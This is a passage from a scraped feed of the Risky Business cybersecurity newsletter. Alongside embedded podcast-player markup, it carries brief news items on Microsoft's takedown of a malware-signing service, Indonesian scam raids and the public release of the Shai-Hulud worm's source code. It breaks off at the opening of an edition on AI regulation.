class=&quot;currentTime&quot;&gt;0:00&lt;/span&gt; / &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;duration&quot;&gt; 14:01 &lt;/span&gt; &lt;/div&gt; &lt;!-- Subscribe Buttons --&gt; &lt;div style=&quot;width: 90%; display: flex; justify-content: space-between; align-items: center; padding-left: 5%;&quot;&gt; &lt;div style=&quot;padding-right:20px;&quot; class=&quot;subText&quot;&gt; &lt;strong&gt;Subscribe &amp;nbsp;&lt;/strong&gt; &lt;/div&gt; &lt;div style=&quot;display: flex; align-items: center; gap: 6px; margin: 0; flex-grow: 1;&quot; class=&quot;subContainer&quot;&gt; &lt;a href=&quot;https://podcasts.apple.com/au/podcast/risky-business-news/id1621305970&quot; class=&quot;icon apple-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 48px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://overcast.fm/itunes1621305970&quot; class=&quot;icon overcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 141px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://pca.st/yicebxgl&quot; class=&quot;icon pocketcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 234px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://open.spotify.com/show/0BdExoUZqbGsBYjt6QZl4Q&quot; class=&quot;icon spotify-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 420px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://risky.biz/feeds/risky-business-news&quot; class=&quot;icon rss-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 327px 96px;&quot;&gt;&lt;/a&gt; &lt;/div&gt; &lt;a href=&quot;https://risky.biz&quot;&gt; &lt;img src=&quot;https://risky.biz/static/img/RB_Site_Logo.svg&quot; alt=&quot;Logo&quot; style=&quot;margin-left: 0; height: 32px; display: block; padding-right: 5%;&quot; id=&quot;logo&quot; class=&quot;logo playerLogo&quot;&gt; &lt;/a&gt; &lt;script&gt; document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); function resizeElements(player) { const logo = player.querySelector(&quot;.logo&quot;); const subscribeIcons = player.querySelectorAll(&quot;.icon&quot;); const subscribeContainer = player.querySelector(&quot;.subContainer&quot;); // Select subContainer by class const subText = player.querySelector(&quot;.subText&quot;); // Select subText by class if (player.offsetWidth &lt;= 425) { // Hide logo if (logo) { logo.style.display = &quot;none&quot;; } } else if (player.offsetWidth &lt;= 500) { // Show logo and scale logo and icons to 70% if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(0.7)&quot;; logo.style.transformOrigin = &quot;center&quot;; logo.style.verticalAlign = &quot;middle&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(0.7)&quot;; icon.style.transformOrigin = &quot;center&quot;; icon.style.verticalAlign = &quot;middle&quot;; }); // Remove padding from subText and set font-size to 12px if (subText) { subText.style.padding = &quot;0&quot;; subText.style.fontSize = &quot;12px&quot;; } // Set gap in subContainer to 0px if (subscribeContainer) { subscribeContainer.style.gap = &quot;0px&quot;; } } else { // Reset scaling, alignment, and visibility if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(1)&quot;; logo.style.verticalAlign = &quot;baseline&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(1)&quot;; icon.style.verticalAlign = &quot;baseline&quot;; }); // Reset padding and font-size in subText if (subText) { subText.style.padding = &quot;0 20px&quot;; // Default padding subText.style.fontSize = &quot;inherit&quot;; // Default font-size } // Reset gap in subContainer if (subscribeContainer) { subscribeContainer.style.gap = &quot;6px&quot;; // Default gap } } } function handleResize() { players.forEach(player =&gt; { resizeElements(player); }); } // Run on initial load and resize handleResize(); window.addEventListener(&quot;resize&quot;, handleResize); }); &lt;/script&gt; &lt;/div&gt; &lt;/div&gt; &lt;script&gt; // Custom Audio Player document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); players.forEach(function (player) { // Skip if already initialized if (player.dataset.initialized === &quot;true&quot;) return; // Mark player as initialized player.dataset.initialized = &quot;true&quot;; const audio = player.querySelector(&quot;.audioElement&quot;); const playPauseBtn = player.querySelector(&quot;.playPauseBtn&quot;); const progressBar = player.querySelector(&quot;.progressBar&quot;); const currentTimeEl = player.querySelector(&quot;.currentTime&quot;); const durationEl = player.querySelector(&quot;.duration&quot;); if (!audio || !playPauseBtn || !progressBar || !currentTimeEl || !durationEl) { console.error(&quot;One or more player elements not found:&quot;, { audio, playPauseBtn, progressBar, currentTimeEl, durationEl }); return; } playPauseBtn.addEventListener(&quot;click&quot;, () =&gt; { if (audio.paused) { audio.play(); playPauseBtn.textContent = &quot;&#x23F8;&quot;; // GA4 event for starting audio gtag(&quot;event&quot;, &quot;audio_play&quot;, { &quot;content_title&quot;: &quot;Sponsored: Push Security goes AI threat hunting in browser telemetry&quot;, &quot;content_type&quot;: &quot;audio&quot; }); } else { audio.pause(); playPauseBtn.textContent = &quot;&#x25B6;&quot;; } }); audio.addEventListener(&quot;timeupdate&quot;, () =&gt; { if (audio.duration) { progressBar.value = (audio.currentTime / audio.duration) * 100; currentTimeEl.textContent = formatTime(audio.currentTime); } }); audio.addEventListener(&quot;loadedmetadata&quot;, () =&gt; { durationEl.textContent = formatTime(audio.duration); }); progressBar.addEventListener(&quot;input&quot;, () =&gt; { if (audio.duration) { audio.currentTime = (progressBar.value / 100) * audio.duration; } }); function formatTime(seconds) { const minutes = Math.floor(seconds / 60); const secs = Math.floor(seconds % 60); return `${minutes}:${secs &lt; 10 ? &quot;0&quot; : &quot;&quot;}${secs}`; } }); }); &lt;/script&gt; &lt;/body&gt; &lt;/html&gt; "></iframe> <!--kg-card-end: html--> <h2 id="risky-biz-talks">Risky Biz Talks</h2><p><em>You can find the audio edition of this newsletter and other fine podcasts and interviews in the Risky Biz News feed (</em><a href="https://risky.biz/feeds/risky-business-news"><em><u>RSS</u></em></a><em>, </em><a href="https://podcasts.apple.com/au/podcast/risky-business-news/id1621305970"><em><u>iTunes</u></em></a><em> or </em><a href="https://open.spotify.com/show/0BdExoUZqbGsBYjt6QZl4Q"><em><u>Spotify</u></em></a><em>).&#xA0;&#xA0;</em></p><p><em>In our last &quot;Between Two Nerds&quot; discussion Tom Uren and </em><a href="https://twitter.com/thegrugq"><em><u>The Grugq</u></em></a><em> look at Department 4 of Bauman Moscow State Technical University where students learn how to hack for the state. Its curriculum is extremely explicit about how the hacking and propaganda operations are relevant to state operations. They discuss whether this is an advantage for Russia&#x2019;s cyber program and look at what Western intelligence agencies do instead.</em></p> <!--kg-card-begin: html--> <iframe frameborder="0" style="width: 100%; height: 156px;" srcdoc=" &lt;!DOCTYPE html&gt; &lt;html&gt; &lt;head&gt; &lt;title&gt;Risky Business Player&lt;/title&gt; &lt;/head&gt; &lt;body&gt; &lt;!-- Include the Google Font Inter --&gt; &lt;style&gt; @import url(&quot;https://fonts.googleapis.com/css2?family=Inter:wght@400;700&amp;display=swap&quot;); body { margin: 0px; } .audio-player { font-family: &quot;Inter&quot;, sans-serif; } .icon { background-image: url(&quot;https://risky.biz/static/img/icons/subscribe-icons.svg&quot;); display: block; width: 33px; height: 33px; background-size: 528px 111px; } } &lt;/style&gt; &lt;!-- Audio player --&gt; &lt;div class=&quot;audio-player&quot; style=&quot;display: flex; flex-direction: column; gap: 5px; padding-top: 0px; padding-bottom: 20px; background: rgb(244, 244, 239); background: linear-gradient(0deg, rgba(244, 244, 239, 1) 0%, rgba(244, 244, 239, 0) 100%); border-radius: 8px; border: 1px solid #d7d7d7; width: calc(100% - 1px) min-width: 350px;&quot;&gt; &lt;audio class=&quot;audioElement&quot; preload=&quot;none&quot;&gt; &lt;source src=&quot;https://dts.podtrac.com/redirect.mp3/media3.risky.biz/BTN167.mp3&quot; type=&quot;audio/mpeg&quot;&gt; Your browser does not support the audio element. &lt;/audio&gt; &lt;!-- Title --&gt; &lt;div style=&quot;background: #666666; color: #FEFEFE; font-size: 14px; padding-left: 5%; padding-right: 5%; padding-top: 10px; padding-bottom: 10px; border-top-left-radius: 8px; border-top-right-radius: 8px; white-space: nowrap; overflow: hidden; text-overflow: ellipsis; margin-bottom: 10px;&quot;&gt; &lt;a style=&quot;color:#FEFEFE; text-decoration: none;&quot; target=&quot;_new&quot; href=&quot;https://risky.biz/BTN167/&quot;&gt;Between Two Nerds: Russia&apos;s hacker university&lt;/a&gt; &lt;/div&gt; &lt;!-- Player Controls and Progress Bar --&gt; &lt;div style=&quot;display: flex; align-items: center; justify-content: center; gap: 10px; width: 90%; margin: 0 auto;&quot;&gt; &lt;button type=&quot;button&quot; class=&quot;playPauseBtn&quot; style=&quot;color: #1e1e1e; background-color: #FAFAFA; font-size: 18px; border: none; padding: 10px; border-radius: 8px; cursor: pointer; height: 42px; width: 42px; text-align: center; display: flex; align-items: center; justify-content: center;&quot;&gt;&amp;#9654;&lt;/button&gt; &lt;input type=&quot;range&quot; style=&quot;flex-grow: 1; -webkit-appearance: none; height: 5px; background: #ddd; border-radius: 8px; outline: none; cursor: pointer;&quot; class=&quot;progressBar&quot; value=&quot;0&quot; min=&quot;0&quot; max=&quot;100&quot; /&gt; &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;currentTime&quot;&gt;0:00&lt;/span&gt; / &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;duration&quot;&gt; 29:22 &lt;/span&gt; &lt;/div&gt; &lt;!-- Subscribe Buttons --&gt; &lt;div style=&quot;width: 90%; display: flex; justify-content: space-between; align-items: center; padding-left: 5%;&quot;&gt; &lt;div style=&quot;padding-right:20px;&quot; class=&quot;subText&quot;&gt; &lt;strong&gt;Subscribe &amp;nbsp;&lt;/strong&gt; &lt;/div&gt; &lt;div style=&quot;display: flex; align-items: center; gap: 6px; margin: 0; flex-grow: 1;&quot; class=&quot;subContainer&quot;&gt; &lt;a href=&quot;https://podcasts.apple.com/au/podcast/risky-business-news/id1621305970&quot; class=&quot;icon apple-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 48px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://overcast.fm/itunes1621305970&quot; class=&quot;icon overcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 141px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://pca.st/yicebxgl&quot; class=&quot;icon pocketcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 234px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://open.spotify.com/show/0BdExoUZqbGsBYjt6QZl4Q&quot; class=&quot;icon spotify-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 420px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://risky.biz/feeds/risky-business-news&quot; class=&quot;icon rss-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 327px 96px;&quot;&gt;&lt;/a&gt; &lt;/div&gt; &lt;a href=&quot;https://risky.biz&quot;&gt; &lt;img src=&quot;https://risky.biz/static/img/RB_Site_Logo.svg&quot; alt=&quot;Logo&quot; style=&quot;margin-left: 0; height: 32px; display: block; padding-right: 5%;&quot; id=&quot;logo&quot; class=&quot;logo playerLogo&quot;&gt; &lt;/a&gt; &lt;script&gt; document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); function resizeElements(player) { const logo = player.querySelector(&quot;.logo&quot;); const subscribeIcons = player.querySelectorAll(&quot;.icon&quot;); const subscribeContainer = player.querySelector(&quot;.subContainer&quot;); // Select subContainer by class const subText = player.querySelector(&quot;.subText&quot;); // Select subText by class if (player.offsetWidth &lt;= 425) { // Hide logo if (logo) { logo.style.display = &quot;none&quot;; } } else if (player.offsetWidth &lt;= 500) { // Show logo and scale logo and icons to 70% if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(0.7)&quot;; logo.style.transformOrigin = &quot;center&quot;; logo.style.verticalAlign = &quot;middle&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(0.7)&quot;; icon.style.transformOrigin = &quot;center&quot;; icon.style.verticalAlign = &quot;middle&quot;; }); // Remove padding from subText and set font-size to 12px if (subText) { subText.style.padding = &quot;0&quot;; subText.style.fontSize = &quot;12px&quot;; } // Set gap in subContainer to 0px if (subscribeContainer) { subscribeContainer.style.gap = &quot;0px&quot;; } } else { // Reset scaling, alignment, and visibility if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(1)&quot;; logo.style.verticalAlign = &quot;baseline&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(1)&quot;; icon.style.verticalAlign = &quot;baseline&quot;; }); // Reset padding and font-size in subText if (subText) { subText.style.padding = &quot;0 20px&quot;; // Default padding subText.style.fontSize = &quot;inherit&quot;; // Default font-size } // Reset gap in subContainer if (subscribeContainer) { subscribeContainer.style.gap = &quot;6px&quot;; // Default gap } } } function handleResize() { players.forEach(player =&gt; { resizeElements(player); }); } // Run on initial load and resize handleResize(); window.addEventListener(&quot;resize&quot;, handleResize); }); &lt;/script&gt; &lt;/div&gt; &lt;/div&gt; &lt;script&gt; // Custom Audio Player document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); players.forEach(function (player) { // Skip if already initialized if (player.dataset.initialized === &quot;true&quot;) return; // Mark player as initialized player.dataset.initialized = &quot;true&quot;; const audio = player.querySelector(&quot;.audioElement&quot;); const playPauseBtn = player.querySelector(&quot;.playPauseBtn&quot;); const progressBar = player.querySelector(&quot;.progressBar&quot;); const currentTimeEl = player.querySelector(&quot;.currentTime&quot;); const durationEl = player.querySelector(&quot;.duration&quot;); if (!audio || !playPauseBtn || !progressBar || !currentTimeEl || !durationEl) { console.error(&quot;One or more player elements not found:&quot;, { audio, playPauseBtn, progressBar, currentTimeEl, durationEl }); return; } playPauseBtn.addEventListener(&quot;click&quot;, () =&gt; { if (audio.paused) { audio.play(); playPauseBtn.textContent = &quot;&#x23F8;&quot;; // GA4 event for starting audio gtag(&quot;event&quot;, &quot;audio_play&quot;, { &quot;content_title&quot;: &quot;Between Two Nerds: Russia&apos;s hacker university&quot;, &quot;content_type&quot;: &quot;audio&quot; }); } else { audio.pause(); playPauseBtn.textContent = &quot;&#x25B6;&quot;; } }); audio.addEventListener(&quot;timeupdate&quot;, () =&gt; { if (audio.duration) { progressBar.value = (audio.currentTime / audio.duration) * 100; currentTimeEl.textContent = formatTime(audio.currentTime); } }); audio.addEventListener(&quot;loadedmetadata&quot;, () =&gt; { durationEl.textContent = formatTime(audio.duration); }); progressBar.addEventListener(&quot;input&quot;, () =&gt; { if (audio.duration) { audio.currentTime = (progressBar.value / 100) * audio.duration; } }); function formatTime(seconds) { const minutes = Math.floor(seconds / 60); const secs = Math.floor(seconds % 60); return `${minutes}:${secs &lt; 10 ? &quot;0&quot; : &quot;&quot;}${secs}`; } }); }); &lt;/script&gt; &lt;/body&gt; &lt;/html&gt; "></iframe> <!--kg-card-end: html--> <p><em>Or watch it on YouTube!</em></p><figure class="kg-card kg-embed-card"><iframe width="200" height="113" src="https://www.youtube.com/embed/2aaBjsr6A_M?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen title="Between Two Nerds: Russia&apos;s hacker university"></iframe></figure><h2 id="from-risky-bulletin">From <a href="https://news.risky.biz/tag/risky-bulletin/"><em><u>Risky Bulletin</u></em></a>:</h2><p><strong>Microsoft takes down MSaaS used by ransomware gangs: </strong>Microsoft has sued and seized domains and server infrastructure belonging to SignSpaceCloud (signspace[.]cloud), a Russian cybercrime service that sold code signing certificates to malware and ransomware gangs.</p><p>The service, which Microsoft is tracking as <a href="https://blogs.microsoft.com/on-the-issues/2026/05/19/disrupting-fox-tempest-a-cybercrime-service/"><u>Fox Tempest</u></a>, has been running since May of last year and is what cybersecurity experts call a malware-signing-as-a-service (MSaaS).</p><p>The group used hundreds of fake accounts on the <a href="https://learn.microsoft.com/en-us/azure/artifact-signing/overview"><u>Microsoft Artifact Signing</u></a> service to obtain code signing certificates that it later resold on its website for thousands of US dollars.</p><p>Cybercrime groups paid the hefty prices but used the certificates to sign their malware and make it appear as software from legitimate developers.</p><p>[<a href="https://news.risky.biz/risky-bulletin-microsoft-takes-down-msaas-used-by-ransomware-gangs/"><u>more</u></a> on <em>Risky Bulletin</em>]</p><p><strong>Indonesia emerges as a new hub for cyber scams: </strong>Indonesia is emerging as a new hub for cyber scam operations and illegal online gambling in Southeast Asia after massive crackdowns in neighboring countries have sent criminal groups fleeing across borders and seeking to relocate facilities.</p><p>Local authorities have detained more than 550 suspects following three raids this month alone.</p><p>More than 200 suspects were detained after a raid on an apartment complex in the city of <a href="https://www.channelnewsasia.com/asia/indonesia-batam-online-scam-raid-foreign-nationals-detained-baloi-6109136"><u>Batam</u></a> on May 6. Another 321 were arrested in a commercial building near <a href="https://www.pbs.org/newshour/world/indonesian-police-arrest-321-foreigners-in-online-gambling-crackdown"><u>Jakarta&apos;s Chinatown</u></a> neighborhood on May 10. Another 30 were then detained at guest houses on the <a href="https://jakartaglobe.id/news/bali-police-uncover-alleged-international-cyber-scamming-ring"><u>island of Bali</u></a> a few days after.</p><p>[<a href="https://news.risky.biz/risky-bulletin-indonesia-emerges-as-a-new-hub-for-cyber-scams/"><u>more</u></a> on <em>Risky Bulletin</em>]</p><p><strong>Shai-Hulud goes open-source: </strong>Individuals claiming to be associated with the TeamPCP hacking group have released the source code of the Shai-Hulud worm that has devastated open-source libraries across the npm and PyPI ecosystems.</p><p>The code was released this week on the Breached[.]st hacking forum.</p><p>It&#xA0; was released two days after it was used in a <a href="https://tanstack.com/blog/npm-supply-chain-compromise-postmortem"><u>supply chain attack</u></a> that compromised the TanStack React framework and then spread to almost 400 packages, including libraries at AI company Mistral and business automation giant UiPath.</p><p>Although threat actors have a tendency to lie about what they release, the worm&apos;s authenticity has already been confirmed as a near exact match by Datadog researchers</p><p>[<a href="https://news.risky.biz/risky-bulletin-shai-hulud-goes-open-source/"><u>more</u></a> on <em>Risky Bulletin</em>]</p>
  109. Srsly Risky Biz: The AI Regulation Knife Fight

    Thu, 14 May 2026 05:52:56 -0000

    <p><em>Your weekly dose of Seriously Risky Business news is written by </em><a href="https://twitter.com/tomatospy"><em><u>Tom Uren</u></em></a><em> and edited by Patrick Gray. This week&apos;s edition is sponsored by </em><a href="https://knocknoc.io/"><em><u>Knocknoc</u></em></a><em>.</em></p><p><em>You can hear a podcast discussion of this newsletter by searching for &quot;Risky Business News&quot; in your podcatcher or subscribing via</em></p>
    <img src="https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/2026/05/2026-05-14-maxime-gilbert-X-4NYxVZ4R0-unsplash-2.jpg" alt="Srsly Risky Biz: The AI Regulation Knife Fight"><p><em>Your weekly dose of Seriously Risky Business news is written by </em><a href="https://twitter.com/tomatospy"><em><u>Tom Uren</u></em></a><em> and edited by Patrick Gray. This week&apos;s edition is sponsored by </em><a href="https://knocknoc.io/"><em><u>Knocknoc</u></em></a><em>.</em></p><p><em>You can hear a podcast discussion of this newsletter by searching for &quot;Risky Business News&quot; in your podcatcher or subscribing via </em><a href="https://risky.biz/feeds/risky-business-news/"><em><u>this RSS feed</u></em></a><em>.</em></p> <!--kg-card-begin: html--> <iframe frameborder="0" style="width: 100%; height: 156px;" srcdoc=" &lt;!DOCTYPE html&gt; &lt;html&gt; &lt;head&gt; &lt;title&gt;Risky Business Player&lt;/title&gt; &lt;/head&gt; &lt;body&gt; &lt;!-- Include the Google Font Inter --&gt; &lt;style&gt; @import url(&quot;https://fonts.googleapis.com/css2?family=Inter:wght@400;700&amp;display=swap&quot;); body { margin: 0px; } .audio-player { font-family: &quot;Inter&quot;, sans-serif; } .icon { background-image: url(&quot;https://risky.biz/static/img/icons/subscribe-icons.svg&quot;); display: block; width: 33px; height: 33px; background-size: 528px 111px; } } &lt;/style&gt; &lt;!-- Audio player --&gt; &lt;div class=&quot;audio-player&quot; style=&quot;display: flex; flex-direction: column; gap: 5px; padding-top: 0px; padding-bottom: 20px; background: rgb(244, 244, 239); background: linear-gradient(0deg, rgba(244, 244, 239, 1) 0%, rgba(244, 244, 239, 0) 100%); border-radius: 8px; border: 1px solid #d7d7d7; width: calc(100% - 1px) min-width: 350px;&quot;&gt; &lt;audio class=&quot;audioElement&quot; preload=&quot;none&quot;&gt; &lt;source src=&quot;https://dts.podtrac.com/redirect.mp3/media3.risky.biz/SRB167.mp3&quot; type=&quot;audio/mpeg&quot;&gt; Your browser does not support the audio element. &lt;/audio&gt; &lt;!-- Title --&gt; &lt;div style=&quot;background: #666666; color: #FEFEFE; font-size: 14px; padding-left: 5%; padding-right: 5%; padding-top: 10px; padding-bottom: 10px; border-top-left-radius: 8px; border-top-right-radius: 8px; white-space: nowrap; overflow: hidden; text-overflow: ellipsis; margin-bottom: 10px;&quot;&gt; &lt;a style=&quot;color:#FEFEFE; text-decoration: none;&quot; target=&quot;_new&quot; href=&quot;https://risky.biz/SRB167/&quot;&gt;Srsly Risky Biz: The AI Regulation Knife Fight&lt;/a&gt; &lt;/div&gt; &lt;!-- Player Controls and Progress Bar --&gt; &lt;div style=&quot;display: flex; align-items: center; justify-content: center; gap: 10px; width: 90%; margin: 0 auto;&quot;&gt; &lt;button type=&quot;button&quot; class=&quot;playPauseBtn&quot; style=&quot;color: #1e1e1e; background-color: #FAFAFA; font-size: 18px; border: none; padding: 10px; border-radius: 8px; cursor: pointer; height: 42px; width: 42px; text-align: center; display: flex; align-items: center; justify-content: center;&quot;&gt;&amp;#9654;&lt;/button&gt; &lt;input type=&quot;range&quot; style=&quot;flex-grow: 1; -webkit-appearance: none; height: 5px; background: #ddd; border-radius: 8px; outline: none; cursor: pointer;&quot; class=&quot;progressBar&quot; value=&quot;0&quot; min=&quot;0&quot; max=&quot;100&quot; /&gt; &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;currentTime&quot;&gt;0:00&lt;/span&gt; / &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;duration&quot;&gt; 23:34 &lt;/span&gt; &lt;/div&gt; &lt;!-- Subscribe Buttons --&gt; &lt;div style=&quot;width: 90%; display: flex; justify-content: space-between; align-items: center; padding-left: 5%;&quot;&gt; &lt;div style=&quot;padding-right:20px;&quot; class=&quot;subText&quot;&gt; &lt;strong&gt;Subscribe &amp;nbsp;&lt;/strong&gt; &lt;/div&gt; &lt;div style=&quot;display: flex; align-items: center; gap: 6px; margin: 0; flex-grow: 1;&quot; class=&quot;subContainer&quot;&gt; &lt;a href=&quot;https://podcasts.apple.com/au/podcast/risky-business-news/id1621305970&quot; class=&quot;icon apple-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 48px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://overcast.fm/itunes1621305970&quot; class=&quot;icon overcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 141px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://pca.st/yicebxgl&quot; class=&quot;icon pocketcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 234px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://open.spotify.com/show/0BdExoUZqbGsBYjt6QZl4Q&quot; class=&quot;icon spotify-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 420px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://risky.biz/feeds/risky-business-news&quot; class=&quot;icon rss-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 327px 96px;&quot;&gt;&lt;/a&gt; &lt;/div&gt; &lt;a href=&quot;https://risky.biz&quot;&gt; &lt;img src=&quot;https://risky.biz/static/img/RB_Site_Logo.svg&quot; alt=&quot;Logo&quot; style=&quot;margin-left: 0; height: 32px; display: block; padding-right: 5%;&quot; id=&quot;logo&quot; class=&quot;logo playerLogo&quot;&gt; &lt;/a&gt; &lt;script&gt; document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); function resizeElements(player) { const logo = player.querySelector(&quot;.logo&quot;); const subscribeIcons = player.querySelectorAll(&quot;.icon&quot;); const subscribeContainer = player.querySelector(&quot;.subContainer&quot;); // Select subContainer by class const subText = player.querySelector(&quot;.subText&quot;); // Select subText by class if (player.offsetWidth &lt;= 425) { // Hide logo if (logo) { logo.style.display = &quot;none&quot;; } } else if (player.offsetWidth &lt;= 500) { // Show logo and scale logo and icons to 70% if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(0.7)&quot;; logo.style.transformOrigin = &quot;center&quot;; logo.style.verticalAlign = &quot;middle&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(0.7)&quot;; icon.style.transformOrigin = &quot;center&quot;; icon.style.verticalAlign = &quot;middle&quot;; }); // Remove padding from subText and set font-size to 12px if (subText) { subText.style.padding = &quot;0&quot;; subText.style.fontSize = &quot;12px&quot;; } // Set gap in subContainer to 0px if (subscribeContainer) { subscribeContainer.style.gap = &quot;0px&quot;; } } else { // Reset scaling, alignment, and visibility if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(1)&quot;; logo.style.verticalAlign = &quot;baseline&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(1)&quot;; icon.style.verticalAlign = &quot;baseline&quot;; }); // Reset padding and font-size in subText if (subText) { subText.style.padding = &quot;0 20px&quot;; // Default padding subText.style.fontSize = &quot;inherit&quot;; // Default font-size } // Reset gap in subContainer if (subscribeContainer) { subscribeContainer.style.gap = &quot;6px&quot;; // Default gap } } } function handleResize() { players.forEach(player =&gt; { resizeElements(player); }); } // Run on initial load and resize handleResize(); window.addEventListener(&quot;resize&quot;, handleResize); }); &lt;/script&gt; &lt;/div&gt; &lt;/div&gt; &lt;script&gt; // Custom Audio Player document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); players.forEach(function (player) { // Skip if already initialized if (player.dataset.initialized === &quot;true&quot;) return; // Mark player as initialized player.dataset.initialized = &quot;true&quot;; const audio = player.querySelector(&quot;.audioElement&quot;); const playPauseBtn = player.querySelector(&quot;.playPauseBtn&quot;); const progressBar = player.querySelector(&quot;.progressBar&quot;); const currentTimeEl = player.querySelector(&quot;.currentTime&quot;); const durationEl = player.querySelector(&quot;.duration&quot;); if (!audio || !playPauseBtn || !progressBar || !currentTimeEl || !durationEl) { console.error(&quot;One or more player elements not found:&quot;, { audio, playPauseBtn, progressBar, currentTimeEl, durationEl }); return; } playPauseBtn.addEventListener(&quot;click&quot;, () =&gt; { if (audio.paused) { audio.play(); playPauseBtn.textContent = &quot;&#x23F8;&quot;; // GA4 event for starting audio gtag(&quot;event&quot;, &quot;audio_play&quot;, { &quot;content_title&quot;: &quot;Srsly Risky Biz: The AI Regulation Knife Fight&quot;, &quot;content_type&quot;: &quot;audio&quot; }); } else { audio.pause(); playPauseBtn.textContent = &quot;&#x25B6;&quot;; } }); audio.addEventListener(&quot;timeupdate&quot;, () =&gt; { if (audio.duration) { progressBar.value = (audio.currentTime / audio.duration) * 100; currentTimeEl.textContent = formatTime(audio.currentTime); } }); audio.addEventListener(&quot;loadedmetadata&quot;, () =&gt; { durationEl.textContent = formatTime(audio.duration); }); progressBar.addEventListener(&quot;input&quot;, () =&gt; { if (audio.duration) { audio.currentTime = (progressBar.value / 100) * audio.duration; } }); function formatTime(seconds) { const minutes = Math.floor(seconds / 60); const secs = Math.floor(seconds % 60); return `${minutes}:${secs &lt; 10 ? &quot;0&quot; : &quot;&quot;}${secs}`; } }); }); &lt;/script&gt; &lt;/body&gt; &lt;/html&gt; "></iframe> <!--kg-card-end: html--> <figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/2026/05/2026-05-14-maxime-gilbert-X-4NYxVZ4R0-unsplash.jpg" class="kg-image" alt="Srsly Risky Biz: The AI Regulation Knife Fight" loading="lazy" width="2000" height="1325" srcset="https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/size/w600/2026/05/2026-05-14-maxime-gilbert-X-4NYxVZ4R0-unsplash.jpg 600w, https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/size/w1000/2026/05/2026-05-14-maxime-gilbert-X-4NYxVZ4R0-unsplash.jpg 1000w, https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/size/w1600/2026/05/2026-05-14-maxime-gilbert-X-4NYxVZ4R0-unsplash.jpg 1600w, https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/size/w2400/2026/05/2026-05-14-maxime-gilbert-X-4NYxVZ4R0-unsplash.jpg 2400w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Photo by </span><a href="https://unsplash.com/@mxm_gilbert?utm_source=unsplash&amp;utm_medium=referral&amp;utm_content=creditCopyText"><span style="white-space: pre-wrap;">Maxime Gilbert</span></a><span style="white-space: pre-wrap;"> on </span><a href="https://unsplash.com/photos/grayscale-photo-of-ram-head-X-4NYxVZ4R0?utm_source=unsplash&amp;utm_medium=referral&amp;utm_content=creditCopyText"><span style="white-space: 